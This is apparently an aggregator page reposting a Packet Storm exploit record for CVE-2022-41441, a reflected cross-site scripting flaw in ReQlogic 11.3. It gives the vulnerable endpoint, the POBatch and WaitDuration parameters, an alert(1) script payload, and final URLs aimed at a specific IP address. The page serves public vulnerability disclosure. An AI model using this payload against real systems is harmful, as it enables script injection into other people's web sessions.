Security
Headlines
HeadlinesLatestCVEs

Headline

ReQlogic 11.3 Cross Site Scripting

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

Packet Storm
Open in Source
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby

ReQlogic 11.3 Cross Site Scripting

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

ReQlogic 11.3 Cross Site Scripting

# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

File Tags

  • ActiveX (932)
  • Advisory (80,599)
  • Arbitrary (15,917)
  • BBS (2,859)
  • Bypass (1,653)
  • CGI (1,022)
  • Code Execution (7,047)
  • Conference (677)
  • Cracker (840)
  • CSRF (3,306)
  • DoS (22,932)
  • Encryption (2,359)
  • Exploit (50,720)
  • File Inclusion (4,180)
  • File Upload (951)
  • Firewall (821)
  • Info Disclosure (2,689)
  • Intrusion Detection (876)
  • Java (2,957)
  • JavaScript (830)
  • Kernel (6,449)
  • Local (14,297)
  • Magazine (586)
  • Overflow (12,543)
  • Perl (1,419)
  • PHP (5,111)
  • Proof of Concept (2,297)
  • Protocol (3,502)
  • Python (1,488)
  • Remote (30,282)
  • Root (3,534)
  • Rootkit (502)
  • Ruby (603)
  • Scanner (1,633)
  • Security Tool (7,824)
  • Shell (3,133)
  • Shellcode (1,206)
  • Sniffer (890)
  • Spoof (2,182)
  • SQL Injection (16,171)
  • TCP (2,384)
  • Trojan (687)
  • UDP (880)
  • Virus (663)
  • Vulnerability (31,381)
  • Web (9,467)
  • Whitepaper (3,740)
  • x86 (946)
  • XSS (17,581)
  • Other

File Archives

  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • August 2022
  • July 2022
  • June 2022
  • May 2022
  • April 2022
  • Older

Systems

  • AIX (426)
  • Apple (1,960)
  • BSD (370)
  • CentOS (56)
  • Cisco (1,919)
  • Debian (6,714)
  • Fedora (1,691)
  • FreeBSD (1,242)
  • Gentoo (4,288)
  • HPUX (878)
  • iOS (340)
  • iPhone (108)
  • IRIX (220)
  • Juniper (67)
  • Linux (45,130)
  • Mac OS X (684)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (482)
  • RedHat (12,923)
  • Slackware (941)
  • Solaris (1,609)
  • SUSE (1,444)
  • Ubuntu (8,448)
  • UNIX (9,208)
  • UnixWare (185)
  • Windows (6,532)
  • Other

Related news

CVE-2022-41441: Microsoft Dynamics ERP | End-to-End eProcurement Solution | ReQlogic

Multiple cross-site scripting (XSS) vulnerabilities in ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.

Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass
Packet Storm